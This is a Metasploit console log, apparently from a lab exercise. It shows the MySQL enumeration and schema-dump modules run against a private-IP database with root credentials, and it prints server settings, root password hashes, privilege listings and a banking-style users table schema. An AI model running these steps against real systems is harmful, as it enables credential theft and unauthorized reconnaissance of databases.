   PASSWORD  TestPass123!     no        The password for the specified username
   RHOSTS    172.20.0.138     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     3306             yes       The target port (TCP)
   USERNAME  root             no        The username to authenticate as

msf5 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 172.20.0.138

[*] 172.20.0.138:3306 - Running MySQL Enumerator...
[*] 172.20.0.138:3306 - Enumerating Parameters
[*] 172.20.0.138:3306 -         MySQL Version: 5.6.40
[*] 172.20.0.138:3306 -         Compiled for the following OS: Linux
[*] 172.20.0.138:3306 -         Architecture: x86_64
[*] 172.20.0.138:3306 -         Server Hostname: a156b802df29
[*] 172.20.0.138:3306 -         Data Directory: /var/lib/mysql/
[*] 172.20.0.138:3306 -         Logging of queries and logins: ON
[*] 172.20.0.138:3306 -         Log Files Location: OFF
[*] 172.20.0.138:3306 -         Old Password Hashing Algorithm 0
[*] 172.20.0.138:3306 -         Loading of local files: ON
[*] 172.20.0.138:3306 -         Deny logins with old Pre-4.1 Passwords: ON
[*] 172.20.0.138:3306 -         Allow Use of symlinks for Database Files: DISABLED
[*] 172.20.0.138:3306 -         Allow Table Merge: 
[*] 172.20.0.138:3306 -         SSL Connection: DISABLED
[*] 172.20.0.138:3306 - Enumerating Accounts:
[*] 172.20.0.138:3306 -         List of Accounts with Password Hashes:
[+] 172.20.0.138:3306 -                 User: root Host: localhost Password Hash: *F20B31125A91203904A57F21129CD8972CDE7FD3
[+] 172.20.0.138:3306 -                 User: root Host: % Password Hash: *F20B31125A91203904A57F21129CD8972CDE7FD3
[*] 172.20.0.138:3306 -         The following users have GRANT Privilege:
[*] 172.20.0.138:3306 -                 User: root Host: localhost
[*] 172.20.0.138:3306 -                 User: root Host: %
[*] 172.20.0.138:3306 -         The following users have CREATE USER Privilege:
[*] 172.20.0.138:3306 -                 User: root Host: localhost
[*] 172.20.0.138:3306 -                 User: root Host: %
[*] 172.20.0.138:3306 -         The following users have RELOAD Privilege:
[*] 172.20.0.138:3306 -                 User: root Host: localhost
[*] 172.20.0.138:3306 -                 User: root Host: %
[*] 172.20.0.138:3306 -         The following users have SHUTDOWN Privilege:
[*] 172.20.0.138:3306 -                 User: root Host: localhost
[*] 172.20.0.138:3306 -                 User: root Host: %
[*] 172.20.0.138:3306 -         The following users have SUPER Privilege:
[*] 172.20.0.138:3306 -                 User: root Host: localhost
[*] 172.20.0.138:3306 -                 User: root Host: %
[*] 172.20.0.138:3306 -         The following users have FILE Privilege:
[*] 172.20.0.138:3306 -                 User: root Host: localhost
[*] 172.20.0.138:3306 -                 User: root Host: %
[*] 172.20.0.138:3306 -         The following users have PROCESS Privilege:
[*] 172.20.0.138:3306 -                 User: root Host: localhost
[*] 172.20.0.138:3306 -                 User: root Host: %
[*] 172.20.0.138:3306 -         The following accounts have privileges to the mysql database:
[*] 172.20.0.138:3306 -                 User: root Host: localhost
[*] 172.20.0.138:3306 -                 User: root Host: %
[*] 172.20.0.138:3306 -         The following accounts are not restricted by source:
[*] 172.20.0.138:3306 -                 User: root Host: %
[*] Auxiliary module execution completed


msf5 auxiliary(scanner/mysql/mysql_schemadump) > options

Module options (auxiliary/scanner/mysql/mysql_schemadump):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DISPLAY_RESULTS  true             yes       Display the Results to the Screen
   PASSWORD         TestPass123!     no        The password for the specified username
   RHOSTS           172.20.0.138     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT            3306             yes       The target port (TCP)
   THREADS          1                yes       The number of concurrent threads (max one per host)
   USERNAME         root             no        The username to authenticate as

msf5 auxiliary(scanner/mysql/mysql_schemadump) > run

[+] 172.20.0.138:3306     - Schema stored in: /root/.msf4/loot/20200501055000_default_172.20.0.138_mysql_schema_332922.txt
[+] 172.20.0.138:3306     - MySQL Server Schema 
 Host: 172.20.0.138 
 Port: 3306 
 ====================

---
- DBName: HarborBankUsers
  Tables:
  - TableName: users
    Columns:
    - ColumnName: id
      ColumnType: int(11)
    - ColumnName: username
      ColumnType: text
    - ColumnName: password
      ColumnType: text
    - ColumnName: balance
      ColumnType: decimal(13,2)

[*] 172.20.0.138:3306     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed